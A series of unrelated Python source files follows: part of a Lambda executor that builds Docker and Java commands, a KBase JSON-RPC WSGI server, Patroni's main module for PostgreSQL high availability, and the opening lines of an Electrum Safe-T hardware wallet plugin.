common_flags = ' '.join([env_vars_string, network_str, dns_str, additional_flags, rm_flag])
if config.LAMBDA_REMOTE_DOCKER:
cp_cmd = ('%s cp "%s/." "$CONTAINER_ID:%s";' % (
docker_cmd, lambda_cwd, DOCKER_TASK_FOLDER)) if lambda_cwd else ''
cmd = (
'CONTAINER_ID="$(%s create -i'
' %s' # entrypoint
' %s' # debug_docker_java_port
' %s' # common flags
' %s %s' # image and command
')";'
'%s '
'%s start -ai "$CONTAINER_ID";'
) % (docker_cmd, entrypoint, debug_docker_java_port,
common_flags, docker_image, command,
cp_cmd, docker_cmd)
else:
mount_flag = ''
if lambda_cwd:
mount_flag = '-v "%s":%s' % (Util.get_host_path_for_path_in_docker(lambda_cwd), DOCKER_TASK_FOLDER)
cmd = (
'%s run -i'
' %s'
' %s' # code mount
' %s' # common flags
' %s %s'
) % (docker_cmd, entrypoint, mount_flag, common_flags, docker_image, command)
return cmd
class LambdaExecutorLocal(LambdaExecutor):
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
environment = self._prepare_environment(func_details)
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
lambda_function = func_details.function(version)
def do_execute():
# now we're executing in the child process, safe to change CWD and ENV
result = None
try:
if lambda_cwd:
os.chdir(lambda_cwd)
sys.path.insert(0, '')
if environment:
os.environ.update(environment)
result = lambda_function(event, context)
except Exception as e:
result = str(e)
sys.stderr.write('%s %s' % (e, traceback.format_exc()))
raise
finally:
queue.put(result)
process = Process(target=do_execute)
start_time = now(millis=True)
error = None
with CaptureOutput() as c:
try:
process.run()
except Exception as e:
error = e
result = queue.get()
end_time = now(millis=True)
# Make sure to keep the log line below, to ensure the log stream gets created
request_id = long_uid()
log_output = 'START %s: Lambda %s started via "local" executor ...' % (request_id, func_arn)
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ('\n' if log_output else '') + stream
log_output += '\nEND RequestId: %s' % request_id
log_output += '\nREPORT RequestId: %s Duration: %s ms' % (request_id, int((end_time - start_time) * 1000))
# store logs to CloudWatch
_store_logs(func_details, log_output)
result = result.result if isinstance(result, InvocationResult) else result
if error:
LOG.info('Error executing Lambda "%s": %s %s' % (func_arn, error,
''.join(traceback.format_tb(error.__traceback__))))
raise InvocationException(result, log_output)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
def execute_java_lambda(self, event, context, main_file, func_details=None):
handler = func_details.handler
opts = config.LAMBDA_JAVA_OPTS if config.LAMBDA_JAVA_OPTS else ''
event_file = EVENT_FILE_PATTERN.replace('*', short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
class_name = handler.split('::')[0]
classpath = '%s:%s:%s' % (main_file, Util.get_java_classpath(main_file), LAMBDA_EXECUTOR_JAR)
cmd = 'java %s -cp %s %s %s %s' % (opts, classpath, LAMBDA_EXECUTOR_CLASS, class_name, event_file)
LOG.warning(cmd)
result = self.run_lambda_executor(cmd, func_details=func_details)
return result
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ''
# Replace _debug_port_ with a random free port
if '_debug_port_' in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace('_debug_port_', ('%s' % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match('.*address=(.+:)?(\\d+).*', opts)
if m is not None:
cls.debug_java_port = m.groups()[1]
return opts
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r'^%s/(.*)$' % config.TMP_FOLDER,
r'%s/\1' % config.HOST_TMP_FOLDER, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(':', '').replace('\\', '/')
if len(temp) >= 1 and temp[:1] != '/':
temp = '/' + temp
temp = '%s%s' % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
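# Illustrative example (assuming WINDOWS_DOCKER_MOUNT_PREFIX == '/host_mnt'):
# 'C:\\Users\\me\\fn' -> drop ':' and flip backslashes -> 'C/Users/me/fn'
# -> prepend '/' and the mount prefix -> '/host_mnt/C/Users/me/fn'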
@classmethod
def docker_image_for_lambda(cls, func_details):
runtime = func_details.runtime or ''
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
# TODO: remove prefix once execution issues are fixed with dotnetcore/python lambdas
# See https://github.com/lambci/docker-lambda/pull/218
lambdas_to_add_prefix = ['dotnetcore2.0', 'dotnetcore2.1', 'python2.7', 'python3.6', 'python3.7']
if docker_image == 'lambci/lambda' and any(img in docker_tag for img in lambdas_to_add_prefix):
docker_tag = '20191117-%s' % docker_tag
if runtime == 'nodejs14.x':
# TODO temporary fix until lambci image for nodejs14.x becomes available
docker_image = 'localstack/lambda-js'
return '"%s:%s"' % (docker_image, docker_tag)
@classmethod
def get_docker_remove_flag(cls):
return '--rm' if config.LAMBDA_REMOVE_CONTAINERS else ''
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ['.']
base_dir = os.path.dirname(archive)
for pattern in ['%s/*.jar', '%s/lib/*.jar', '%s/java/lib/*.jar', '%s/*.zip']:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append('*.jar')
entries.append('java/lib/*.jar')
result = ':'.join(entries)
return result
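# Illustrative example (assumed layout): for archive '/tmp/fn/handler.jar' with
# a single dependency '/tmp/fn/lib/dep.jar', the classpath relative to '/tmp/fn'
# comes out as:
# '.:lib/dep.jar:handler.jar:*.jar:java/lib/*.jar'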
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
'local': EXECUTOR_LOCAL,
'docker': EXECUTOR_CONTAINERS_SEPARATE,
'docker-reuse': EXECUTOR_CONTAINERS_REUSE
}
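# Illustrative lookup (a minimal sketch, mirroring the mapping above): resolving
# the executor for the configured LAMBDA_EXECUTOR value with a fallback:
# executor = AVAILABLE_EXECUTORS.get(config.LAMBDA_EXECUTOR, DEFAULT_EXECUTOR)
# executor.startup()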
|
cnelsonAppDemoServer.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from cnelsonAppDemo.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'cnelsonAppDemo'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from cnelsonAppDemo.cnelsonAppDemoImpl import cnelsonAppDemo # noqa @IgnorePep8
impl_cnelsonAppDemo = cnelsonAppDemo(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
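# Illustrative usage (doctest-style sketch): sets and frozensets serialize as
# JSON arrays through the encoder above:
# >>> json.dumps({'ids': {1}}, cls=JSONObjectEncoder)
# '{"ids": [1]}'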
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is the same as call() except that the return value is a python
object instead of a JSON string. It is mainly useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level not in self._debug_levels:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level += 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(ServerError, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
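# Illustrative example (assumed headers): with X-headers trusted, the first
# address in a comma-separated X-Forwarded-For chain wins:
# 'HTTP_X_FORWARDED_FOR': '10.0.0.5, 172.16.0.1' -> '10.0.0.5'
# then HTTP_X_REAL_IP is consulted, and finally REMOTE_ADDR.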
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'cnelsonAppDemo'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_cnelsonAppDemo.run_cnelsonAppDemo,
name='cnelsonAppDemo.run_cnelsonAppDemo',
types=[dict])
self.method_authentication['cnelsonAppDemo.run_cnelsonAppDemo'] = 'required' # noqa
self.rpc_service.add(impl_cnelsonAppDemo.status,
name='cnelsonAppDemo.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except ValueError:
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'cnelsonAppDemo ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single-threaded Python BaseHTTP server,
# listening on port 9999 by default, execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system-assigned port
in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
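# Illustrative invocation (hypothetical file paths): given an input file holding
# a JSON-RPC request such as {"method": "cnelsonAppDemo.status", "params": [{}]},
# the response is written to the output path and the exit code is returned:
# exit_code = process_async_cli('/tmp/in.json', '/tmp/out.json', token=None)
# exit_code is 0 on success, or 500 if the response carries an 'error' key.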
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
__init__.py | import logging
import os
import signal
import sys
import time
from patroni.version import __version__
logger = logging.getLogger(__name__)
PATRONI_ENV_PREFIX = 'PATRONI_'
KUBERNETES_ENV_PREFIX = 'KUBERNETES_'
class Patroni(object):
def __init__(self, conf):
from patroni.api import RestApiServer
from patroni.dcs import get_dcs
from patroni.ha import Ha
from patroni.log import PatroniLogger
from patroni.postgresql import Postgresql
from patroni.request import PatroniRequest
from patroni.watchdog import Watchdog
self.setup_signal_handlers()
self.version = __version__
self.logger = PatroniLogger()
self.config = conf
self.logger.reload_config(self.config.get('log', {}))
self.dcs = get_dcs(self.config)
self.watchdog = Watchdog(self.config)
self.load_dynamic_configuration()
self.postgresql = Postgresql(self.config['postgresql'])
self.api = RestApiServer(self, self.config['restapi'])
self.request = PatroniRequest(self.config, True)
self.ha = Ha(self)
self.tags = self.get_tags()
self.next_run = time.time()
self.scheduled_restart = {}
def load_dynamic_configuration(self):
from patroni.exceptions import DCSError
while True:
try:
cluster = self.dcs.get_cluster()
if cluster and cluster.config and cluster.config.data:
if self.config.set_dynamic_configuration(cluster.config):
self.dcs.reload_config(self.config)
self.watchdog.reload_config(self.config)
elif not self.config.dynamic_configuration and 'bootstrap' in self.config:
if self.config.set_dynamic_configuration(self.config['bootstrap']['dcs']):
self.dcs.reload_config(self.config)
break
except DCSError:
logger.warning('Cannot get cluster from DCS')
time.sleep(5)
def get_tags(self):
return {tag: value for tag, value in self.config.get('tags', {}).items()
if tag not in ('clonefrom', 'nofailover', 'noloadbalance', 'nosync') or value}
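# Illustrative example (assumed config): falsy values for the special tags are
# dropped, while any other tag is kept as-is:
# {'nofailover': False, 'replicatefrom': 'node1'} -> {'replicatefrom': 'node1'}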
@property
def nofailover(self):
return bool(self.tags.get('nofailover', False))
@property
def nosync(self):
return bool(self.tags.get('nosync', False))
def reload_config(self, sighup=False):
try:
self.tags = self.get_tags()
self.logger.reload_config(self.config.get('log', {}))
self.watchdog.reload_config(self.config)
if sighup:
self.request.reload_config(self.config)
self.api.reload_config(self.config['restapi'])
self.postgresql.reload_config(self.config['postgresql'], sighup)
self.dcs.reload_config(self.config)
except Exception:
logger.exception('Failed to reload config_file=%s', self.config.config_file)
@property
def replicatefrom(self):
return self.tags.get('replicatefrom')
def sighup_handler(self, *args):
self._received_sighup = True
def sigterm_handler(self, *args):
with self._sigterm_lock:
if not self._received_sigterm:
self._received_sigterm = True
sys.exit()
@property
def noloadbalance(self):
return bool(self.tags.get('noloadbalance', False))
def schedule_next_run(self):
self.next_run += self.dcs.loop_wait
current_time = time.time()
nap_time = self.next_run - current_time
if nap_time <= 0:
self.next_run = current_time
# Release the GIL so we don't starve anyone waiting on async_executor lock
time.sleep(0.001)
# Warn user that Patroni is not keeping up
logger.warning("Loop time exceeded, rescheduling immediately.")
elif self.ha.watch(nap_time):
self.next_run = time.time()
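# Illustrative pacing (assuming dcs.loop_wait == 10): with next_run at t0, the
# loop waits via ha.watch(t0 + 10 - now); if a cycle overruns its slot, next_run
# is reset to the current time and a warning is logged instead of napping.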
@property
def received_sigterm(self):
with self._sigterm_lock:
return self._received_sigterm
def run(self):
self.api.start()
self.logger.start()
self.next_run = time.time()
while not self.received_sigterm:
if self._received_sighup:
self._received_sighup = False
if self.config.reload_local_configuration():
self.reload_config(True)
else:
self.postgresql.config.reload_config(self.config['postgresql'], True)
logger.info(self.ha.run_cycle())
if self.dcs.cluster and self.dcs.cluster.config and self.dcs.cluster.config.data \
and self.config.set_dynamic_configuration(self.dcs.cluster.config):
self.reload_config()
if self.postgresql.role != 'uninitialized':
self.config.save_cache()
self.schedule_next_run()
def setup_signal_handlers(self):
from threading import Lock
self._received_sighup = False
self._sigterm_lock = Lock()
self._received_sigterm = False
if os.name != 'nt':
signal.signal(signal.SIGHUP, self.sighup_handler)
signal.signal(signal.SIGTERM, self.sigterm_handler)
def shutdown(self):
with self._sigterm_lock:
self._received_sigterm = True
try:
self.api.shutdown()
except Exception:
logger.exception('Exception during RestApi.shutdown')
try:
self.ha.shutdown()
except Exception:
logger.exception('Exception during Ha.shutdown')
self.logger.shutdown()
def patroni_main():
import argparse
from multiprocessing import freeze_support
from patroni.config import Config, ConfigParseError
from patroni.validator import schema
freeze_support()
parser = argparse.ArgumentParser()
parser.add_argument('--version', action='version', version='%(prog)s {0}'.format(__version__))
parser.add_argument('--validate-config', action='store_true', help='Run config validator and exit')
parser.add_argument('configfile', nargs='?', default='',
help='Patroni may also read the configuration from the {0} environment variable'
.format(Config.PATRONI_CONFIG_VARIABLE))
args = parser.parse_args()
try:
if args.validate_config:
conf = Config(args.configfile, validator=schema)
sys.exit()
else:
conf = Config(args.configfile)
except ConfigParseError as e:
if e.value:
print(e.value)
parser.print_help()
sys.exit(1)
patroni = Patroni(conf)
try:
patroni.run()
except KeyboardInterrupt:
pass
finally:
patroni.shutdown()
def fatal(string, *args):
sys.stderr.write('FATAL: ' + string.format(*args) + '\n')
sys.exit(1)
def check_psycopg2():
min_psycopg2 = (2, 5, 4)
min_psycopg2_str = '.'.join(map(str, min_psycopg2))
def parse_version(version):
for e in version.split('.'):
try:
yield int(e)
except ValueError:
break
try:
import psycopg2
version_str = psycopg2.__version__.split(' ')[0]
version = tuple(parse_version(version_str))
if version < min_psycopg2:
fatal('Patroni requires psycopg2>={0}, but only {1} is available', min_psycopg2_str, version_str)
except ImportError:
fatal('Patroni requires psycopg2>={0} or psycopg2-binary', min_psycopg2_str)
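# Illustrative parsing (assumed version string): the version is taken from the
# first whitespace-separated token, and non-numeric components stop the tuple
# early, e.g. psycopg2.__version__ == '2.8.6 (dt dec pq3 ext lo64)' yields
# version_str '2.8.6' and version (2, 8, 6).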
def main():
if os.getpid() != 1:
check_psycopg2()
return patroni_main()
# Patroni was started with PID=1; it looks like we are inside a container
pid = 0
# Since we appear to be inside a Docker container, act as the init process
def sigchld_handler(signo, stack_frame):
try:
while True:
ret = os.waitpid(-1, os.WNOHANG)
if ret == (0, 0):
break
elif ret[0] != pid:
logger.info('Reaped pid=%s, exit status=%s', *ret)
except OSError:
pass
def passtochild(signo, stack_frame):
if pid:
os.kill(pid, signo)
if os.name != 'nt':
signal.signal(signal.SIGCHLD, sigchld_handler)
signal.signal(signal.SIGHUP, passtochild)
signal.signal(signal.SIGQUIT, passtochild)
signal.signal(signal.SIGUSR1, passtochild)
signal.signal(signal.SIGUSR2, passtochild)
signal.signal(signal.SIGINT, passtochild)
signal.signal(signal.SIGABRT, passtochild)
signal.signal(signal.SIGTERM, passtochild)
import multiprocessing
patroni = multiprocessing.Process(target=patroni_main)
patroni.start()
pid = patroni.pid
patroni.join()
|
safe_t.py | from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_onion.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_onion.bip32 import BIP32Node
from electrum_onion import constants
from electrum_onion.i18n import _
from electrum_onion.plugin import Device, runs_in_hwd_thread
from electrum_onion.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_onion.keystore import Hardware_KeyStore
from electrum_onion.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
from .client import SafeTClient
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
plugin: 'SafeTPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
@runs_in_hwd_thread
